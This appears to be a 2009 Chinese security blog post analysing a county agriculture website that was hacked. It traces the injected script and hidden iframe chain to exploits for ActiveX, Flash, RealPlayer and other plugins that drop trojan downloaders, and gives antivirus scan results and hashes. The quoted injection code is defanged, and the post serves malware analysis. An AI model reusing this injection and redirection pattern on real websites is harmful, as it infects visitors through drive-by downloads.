`
caobihole
  • 浏览: 945953 次
文章分类
社区版块
存档分类
最新评论

某县农业网被挂马 Trojan.Win32.KillAV.bca/Trojan-Downloader.Win32.Geral.ix

 
阅读更多

某县农业网被挂马 Trojan.Win32.KillAV.bca/Trojan-Downloader.Win32.Geral.ix

endurer 原创
2009-05-05 第1

打开某县农业网,Maxthon提示要安装ActiveX控件。

检查网页代码,发现:
/---
<script src=hxxp://***.w**vg0**.cn></script>
---/


#1 hxxp://***.w**vg0**.cn 包含代码:
/---
if(document.location.href.indexOf("gov")>=0)
{} else {document.write("<div style='display:none'>")
document.write("<iframe src=hxxp://er**.d**ry*63.cn/1*/2**0/index.htm></iframe>")
document.write("</div>")}
---/

其功能为:检查当前网址,如果包含字符串“gov”则无作为,否则输出代码:
/---
<iframe src=hxxp://er**.d**ry*63.cn/1*/2**0/index.htm></iframe>
---/


#1.1 hxxp://er**.d**ry*63.cn/1*/2**0/index.htm 包含代码:
/---
<iframe src=index2.htm width=100 height=0></Iframe>
---/

#1.1.1 hxxp://er**.d**ry*63.cn/1*/2**0/index2.htm 包含代码:
/---
<iframe src=ccqm.htm width=100 height=0></iframe>
<script src="js.css"></script>

---/


#1.1.1.1 hxxp://er**.d**ry*63.cn/1*/2**0/ccqm.htm

利用(clsid:19EFFC12-25FB-479A-A0F2-1569AE1B3365)漏洞,下载hxxp://w*w1.u**ws**3y.com/**1/ActivcX.exe


文件说明符 : D:/test/ActivcX.exe
属性 : A---
数字签名:Microsoft Windows
PE文件:是
语言 : 中文(中国)
文件版本 : 1, 0, 0, 1
版权 : Copyright ? 2008
产品版本 : 1, 0, 0, 1
创建时间 : 2009-5-5 9:33:34
修改时间 : 2009-5-5 9:33:34
大小 : 43016 字节 42.8 KB
MD5 : 614a7b4f6c23783d463c681e46a5735f
SHA1: DD8BB584C4D4915993E57E69A8F8C0E0DABDC59E
CRC32: 3371c540

文件 ActivcX.exe 接收于 2009.05.05 03:35:13 (CET)

反病毒引擎 版本 最后更新 扫描结果
a-squared 4.0.0.101 2009.05.05 Trojan.Win32.AntiAV!IK
AhnLab-V3 5.0.0.2 2009.05.04 -
AntiVir 7.9.0.160 2009.05.04 TR/Killav.PN
Antiy-AVL 2.0.3.1 2009.04.30 -
Authentium 5.1.2.4 2009.05.04 -
Avast 4.8.1335.0 2009.05.04 Win32:Rootkit-gen
AVG 8.5.0.327 2009.05.04 -
BitDefender 7.2 2009.05.04 -
CAT-QuickHeal 10.00 2009.05.04 -
ClamAV 0.94.1 2009.05.04 -
Comodo 1149 2009.05.03 -
DrWeb 4.44.0.09170 2009.05.05 -
eSafe 7.0.17.0 2009.05.03 Suspicious File
eTrust-Vet 31.6.6489 2009.05.05 Win32/Dogrobot.V
F-Prot 4.4.4.56 2009.05.04 -
F-Secure 8.0.14470.0 2009.05.04 -
Fortinet 3.117.0.0 2009.05.04 -
GData 19 2009.05.05 -
Ikarus T3.1.1.49.0 2009.05.05 Trojan.Win32.AntiAV
K7AntiVirus 7.10.723 2009.05.04 -
Kaspersky 7.0.0.125 2009.05.05 -
McAfee 5605 2009.05.04 -
McAfee+Artemis 5605 2009.05.04 -
McAfee-GW-Edition 6.7.6 2009.05.04 Trojan.Killav.PN
Microsoft 1.4602 2009.05.04 Trojan:Win32/Dogrobot.I
NOD32 4052 2009.05.04 a variant of Win32/AntiAV.NAC
Norman 6.01.05 2009.05.04 -
nProtect 2009.1.8.0 2009.05.04 -
Panda 10.0.0.14 2009.05.04 -
PCTools 4.4.2.0 2009.05.03 -
Prevx1 3.0 2009.05.05 -
Rising 21.28.04.00 2009.05.04 -
Sophos 4.41.0 2009.05.05 -
Sunbelt 3.2.1858.2 2009.05.04 BehavesLike.Win32.Malware (v)
Symantec 1.4.4.12 2009.05.05 Downloader
TheHacker 6.3.4.1.318 2009.05.04 -
TrendMicro 8.950.0.1092 2009.05.04 Possible_Mlwr-13
VBA32 3.12.10.4 2009.05.04 suspected of Win32.BrokenEmbeddedSignature (paranoid heuristics)
ViRobot 2009.5.4.1719 2009.05.04 -
VirusBuster 4.6.5.0 2009.05.04 -


附加信息
File size: 43016 bytes
MD5...: 614a7b4f6c23783d463c681e46a5735f
SHA1..: dd8bb584c4d4915993e57e69a8f8c0e0dabdc59e
SHA256: 5860dca29a93c9d639822cdc94c63cf885e15ff211cd750d279a1fa1af9bacd1
SHA512: a74c18c29e0b8be5dc22c50858ec3fcfdcad1d9d4f6563975671469e0cb63347
728addda34e40460edc3af512e800e0725b0b47a8d200b5c6d9e439f7032d286
ssdeep: 768:CpiAgpHguXnl7M/qMa9UybMlbzaLV8tveccjtL0k4x7Uvbj3ACmw0PWa:ARh
uXnlcqMa9Vwlbkf9n4l0bj3ACml
PEiD..: UPX 2.90 [LZMA] -> Markus Oberhumer, Laszlo Molnar & John Reiser
TrID..: File type identification
UPX compressed Win32 Executable (39.5%)
Win32 EXE Yoda's Crypter (34.3%)
Win32 Executable Generic (11.0%)
Win32 Dynamic Link Library (generic) (9.8%)
Generic Win/DOS Executable (2.5%)
PEInfo: PE Structure information

( base data )
entrypointaddress.: 0x1b1b0
timedatestamp.....: 0x49fdbdd7 (Sun May 03 15:52:55 2009)
machinetype.......: 0x14c (I386)

( 3 sections )
name viradd virsiz rawdsiz ntrpy md5
UPX0 0x1000 0x11000 0x0 0.00 d41d8cd98f00b204e9800998ecf8427e
UPX1 0x12000 0xa000 0x9400 7.91 01a9e9405e16934a2a5850ffabb5e036
.rsrc 0x1c000 0x1000 0x600 2.78 c2fbafde5b8e544a6ad8f2e28ebda2c0

( 2 imports )
> KERNEL32.DLL: LoadLibraryA, GetProcAddress, VirtualProtect, VirtualAlloc, VirtualFree, ExitProcess
> USER32.dll: wsprintfA

( 0 exports )
PDFiD.: -
RDS...: NSRL Reference Data Set
-
packers (Kaspersky): PE_Patch.UPX, UPX
packers (Avast): UPX
packers (F-Prot): UPX 

http://bbs.ikaka.com//showtopic-8621775.aspx

回复:ActivcX.exe——614a7b4f6c23783d463c681e46a5735f
发表于: 2009-05-05 10:19

文件名:ActivcX.exe

病毒名:Trojan.Win32.KillAV.bca


您所上报的病毒文件将在瑞星2009的21.28.11版本中处理解决,如遇特殊情况可能会推后几个版本。 

主 题: RE: ActivcX.exe——614a7b4f6c23783d463c681e46a5735f [KLAN-27689534] 
发件人: newvirus@kaspersky.com
日 期: 2009-5-5 10:42:38 
Hello,

ActivcX.exe - Trojan-Downloader.Win32.Geral.ix

New malicious software was found in this file. It's detection will be included in the next update.

Thank you for your help.

-----------------

Regards, Vitaly Butuzov

Virus Analyst, Kaspersky Lab.

#1.1.1.2 hxxp://er**.d**ry*63.cn/1*/2**0/js.css

输出代码:
/---
<iframe width=100 height=0 src=hk14.htm></iframe>
<iframe width=100 height=0 src=hkfl.htm></iframe>
<iframe width=100 height=0 src=hkvod.htm></iframe>
<iframe width=50 height=0 src=hkbb.htm></iframe>
<iframe src=hkxxz.htm width=100 height=0></iframe>
<iframe width=50 height=0 src=hkff.htm></iframe>
<iframe width=100 height=0 src=hk122121.htm></iframe>
---/

#1.1.1.2.1 hxxp://er**.d**ry*63.cn/1*/2**0/hk14.htm 包含代码:
/---
<script src=14.css></script>
<script src=15.css></script>
<script src=16.css></script>
---/
并利用MS06-014安全漏洞下载 hxxp://w*w1.u**ws**3y.com/**1/cX.exe,创建baidueee.vbs来运行。

2009-5-5 9:49:09hxxp://w*w1.u**ws**3y.com/**1/cX.exe//#HttpRead检测到威胁: Trojan-Downloader.Win32.Geral.if


文件说明符 : D:/test/cX.exe
属性 : A---
数字签名:否
PE文件:是
语言 : 中文(中国)
文件版本 : 1, 0, 0, 1
版权 : Copyright ? 2008
产品版本 : 1, 0, 0, 1
创建时间 : 2009-5-5 9:50:17
修改时间 : 2009-5-5 9:50:17
大小 : 40448 字节 39.512 KB
MD5 : b1238d558b393d2688072a2400aedcc2
SHA1: E59D4779418EA92E208797518FC78DA8D996B692
CRC32: 8a02509a

文件 cX.exe 接收于 2009.05.05 03:50:43 (CET)

反病毒引擎 版本 最后更新 扫描结果
a-squared 4.0.0.101 2009.05.05 Trojan.Win32.AntiAV!IK
AhnLab-V3 5.0.0.2 2009.05.04 -
AntiVir 7.9.0.160 2009.05.04 TR/Killav.PN
Antiy-AVL 2.0.3.1 2009.04.30 -
Authentium 5.1.2.4 2009.05.04 -
Avast 4.8.1335.0 2009.05.04 Win32:Rootkit-gen
AVG 8.5.0.327 2009.05.04 -
BitDefender 7.2 2009.05.04 Gen:Trojan.Heur.2014755353
CAT-QuickHeal 10.00 2009.05.04 -
ClamAV 0.94.1 2009.05.04 -
Comodo 1149 2009.05.03 -
DrWeb 4.44.0.09170 2009.05.05 -
eSafe 7.0.17.0 2009.05.03 Suspicious File
eTrust-Vet 31.6.6489 2009.05.05 Win32/Dogrobot.V
F-Prot 4.4.4.56 2009.05.04 -
F-Secure 8.0.14470.0 2009.05.04 -
Fortinet 3.117.0.0 2009.05.04 -
GData 19 2009.05.05 Gen:Trojan.Heur.2014755353
Ikarus T3.1.1.49.0 2009.05.05 Trojan.Win32.AntiAV
K7AntiVirus 7.10.723 2009.05.04 -
Kaspersky 7.0.0.125 2009.05.05 -
McAfee 5605 2009.05.04 -
McAfee+Artemis 5605 2009.05.04 Artemis!B1238D558B39
McAfee-GW-Edition 6.7.6 2009.05.04 Trojan.Killav.PN
Microsoft 1.4602 2009.05.04 Trojan:Win32/Dogrobot.I
NOD32 4052 2009.05.04 a variant of Win32/AntiAV.NAC
Norman 6.01.05 2009.05.04 -
nProtect 2009.1.8.0 2009.05.04 -
Panda 10.0.0.14 2009.05.04 Suspicious file
PCTools 4.4.2.0 2009.05.03 -
Prevx1 3.0 2009.05.05 Medium Risk Malware
Rising 21.28.04.00 2009.05.04 -
Sophos 4.41.0 2009.05.05 Mal/PWS-Fam
Sunbelt 3.2.1858.2 2009.05.04 BehavesLike.Win32.Malware (v)
Symantec 1.4.4.12 2009.05.05 Downloader
TheHacker 6.3.4.1.318 2009.05.04 -
TrendMicro 8.950.0.1092 2009.05.04 Possible_Mlwr-13
VBA32 3.12.10.4 2009.05.04 -
ViRobot 2009.5.4.1719 2009.05.04 -
VirusBuster 4.6.5.0 2009.05.04

附加信息
File size: 40448 bytes
MD5...: b1238d558b393d2688072a2400aedcc2
SHA1..: e59d4779418ea92e208797518fc78da8d996b692
SHA256: bd7c58dd6fffc7c3e073e85e7ab1b0070d0976665df1e5c64d8307f8336b2867
SHA512: 460b6261f52d29793b9a47aa7c3bd88f32732716027d5ad48246a847875833f1
212aafba066a8325760a383304c3b52847dad6d18360333dfcc29484a2be7599
ssdeep: 768:ZpiAgpHguXnl7M/qMa9UybMlbzaLV8tveccjtL0k4x7Uvbj3AC:vRhuXnlcq
Ma9Vwlbkf9n4l0bj3AC
PEiD..: UPX 2.90 [LZMA] -> Markus Oberhumer, Laszlo Molnar & John Reiser
TrID..: File type identification
UPX compressed Win32 Executable (39.5%)
Win32 EXE Yoda's Crypter (34.3%)
Win32 Executable Generic (11.0%)
Win32 Dynamic Link Library (generic) (9.8%)
Generic Win/DOS Executable (2.5%)
PEInfo: PE Structure information

( base data )
entrypointaddress.: 0x1b1b0
timedatestamp.....: 0x49fdbdd7 (Sun May 03 15:52:55 2009)
machinetype.......: 0x14c (I386)

( 3 sections )
name viradd virsiz rawdsiz ntrpy md5
UPX0 0x1000 0x11000 0x0 0.00 d41d8cd98f00b204e9800998ecf8427e
UPX1 0x12000 0xa000 0x9400 7.91 01a9e9405e16934a2a5850ffabb5e036
.rsrc 0x1c000 0x1000 0x600 2.78 c2fbafde5b8e544a6ad8f2e28ebda2c0

( 2 imports )
> KERNEL32.DLL: LoadLibraryA, GetProcAddress, VirtualProtect, VirtualAlloc, VirtualFree, ExitProcess
> USER32.dll: wsprintfA

( 0 exports )
PDFiD.: -
RDS...: NSRL Reference Data Set
-
packers (Kaspersky): PE_Patch.UPX, UPX
packers (Avast): UPX
<a href='http://info.prevx.com/aboutprogramtext.asp?PX5=4949059600D505AE9EA000B8E880E10042A80038' target='_blank'>http://info.prevx.com/aboutprogr ... E10042A80038&lt;/a>
packers (F-Prot): UPX

http://bbs.ikaka.com//showtopic-8621768.aspx

回复:cX.exe——b1238d558b393d2688072a2400aedcc2
发表于: 2009-05-05 14:21

文件名:cX.exe

病毒名:Trojan.Win32.KillAV.bca


您所上报的病毒文件将在瑞星2009的21.28.11版本中处理解决,如遇特殊情况可能会推后几个版本。

#1.1.1.2.2 hxxp://er**.d**ry*63.cn/1*/2**0/hkfl.htm 检测浏览器类型,如果是IE,则输出:
/---
<iframe src=cc11.htm width=100% height=100% scrolling=no frameborder=0>
---/

如果是FireFox,则输出:

/---
<iframe src=cc22.htm width=100% height=100% scrolling=no frameborder=0>
---/

否则输出:

/---
<iframe src=cc11.htm width=100% height=100% scrolling=no frameborder=0>
---/

#1.1.1.2.2.1 hxxp://er**.d**ry*63.cn/1*/2**0/cc11.htm
利用flash播放插件漏洞下载 ci115.swf、ci47.swf、ci45.swf、ci64.swf或ci28.swf。

#1.1.1.2.2.2 hxxp://er**.d**ry*63.cn/1*/2**0/cc22.htm
利用flash播放插件漏洞下载 cf115.swf、cf47.swf、cf45.swf、cf64.swf或cf28.swf.

#1.1.1.2.2.3 hxxp://er**.d**ry*63.cn/1*/2**0/hkvod.htm 引入代码:
/---
<script src="ccvod.css"></script>
<script src="b.css"></script>
<script src="d.css"></script>
---/
利用QVOD播放器(clsid:F3D0D36F-23F8-4682-A195-74C92B03D4AF)漏洞下载hxxp://w*w1.u**ws**3y.com/**1/cX.exe


#1.1.1.2.4 hxxp://er**.d**ry*63.cn/1*/2**0/hkbb.htm 引入代码:
/---
<script src="bff1.css"></script>
<script src="bff.css"></script>
---/

利用暴风影音(clsid:6BE52E1D-E586-474F-A6E2-1A85A9B4D9FB)漏洞下载hxxp://w*w1.u**ws**3y.com/**1/cX.exe


#1.1.1.2.5 hxxp://er**.d**ry*63.cn/1*/2**0/hkxxz.htm 引入代码:
/---
<script src="091.css"></script>
<script src="092.css"></script>
---/
待分析。

#1.1.1.2.6 hxxp://er**.d**ry*63.cn/1*/2**0/hkff.htm 引入:
/---
<script src="ff.css"></script>
---/
clsid:F0E42D50-368C-11D0-AD81-00A0C90DC8D9
利用Microsoft Access快照查看器(snpvw.Snapshot Viewer Control.1,clsid:F0E42D50-368C-11D0-AD81-00A0C90DC8D9)漏洞,下载hxxp://w*w1.u**ws**3y.com/**1/cX.exe,存为C:/Documents and Settings/All Users/「开始」菜单/程序/启动/Thunder.exe。


#1.1.1.2.7 hxxp://er**.d**ry*63.cn/1*/2**0/hk122121.htm 引入:
/---
<script src="Turl.css"></script>
<script src="real.css"></script>
<script src="real1.css"></script>
---/
利用Realplayer(clsid:CFCDAA03-8BE4-11CF-B84B-0020AFBBCCFA)漏洞,下载hxxp://w*w1.u**ws**3y.com/**1/cX.exe,存为C:/Documents and Settings/All Users/「开始」菜单/程序/启动/Thunder.exe。

分享到:
| 遇到让文件夹变文件的 Trojan.Win32.ECode. ...
评论
发表评论

您还没有登录,请您登录后再发表评论

相关推荐

Magicbox
Global site tag (gtag.js) - Google Analytics